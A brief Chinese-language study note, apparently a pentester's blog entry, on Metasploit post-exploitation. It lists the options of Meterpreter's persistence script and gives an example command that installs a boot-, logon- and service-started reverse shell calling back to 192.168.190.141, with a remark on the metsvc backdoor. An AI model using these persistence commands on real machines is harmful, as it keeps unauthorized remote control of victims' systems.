后渗透阶段的简单笔记….TBC

各种模块:

使用方法:meterpreter > run [模块名称]

维持脚本之persistence

meterpreter > run persistence -h
OPTIONS:
-A       #自动启动一个匹配的exploit / multi / handler来连接到代理
-L       #如果未使用%TEMP%,则在目标主机中写入有效负载的位置。
-P       #有效负载使用,默认为windows / meterpreter / reverse_tcp。
-S       #作为服务自动启动代理程序(具有SYSTEM权限)
-T       #要使用的备用可执行模板
-U       #用户登录时自动启动代理
-X       #系统引导时自动启动代理程序
-h       #这个帮助菜单
-i       #每次连接尝试之间的时间间隔(秒)
-p       #运行Metasploit的系统正在侦听的端口
-r       #运行Metasploit监听连接的系统的IP

例子:
run persistence -S -U -X -i 5 -p 6666 -r 192.168.190.141
注意,这个脚本生成的木马 貌似/好像/大概/也许 是一个16位的程序…最高也只能在32位系统里运行,
对于64位系统,可以自行再生成一个msf木马upload到靶机上去,一般情况下,其木马所在位置会在执行这个脚本时输出

权限维持俩脚本之metsvc

emmm,我不是很推荐用这个,这个脚本不是反向连接的,会在目标机上监听一个端口,随便一个谁去连接都是直接拿到权限,包括各种安全扫描工具…..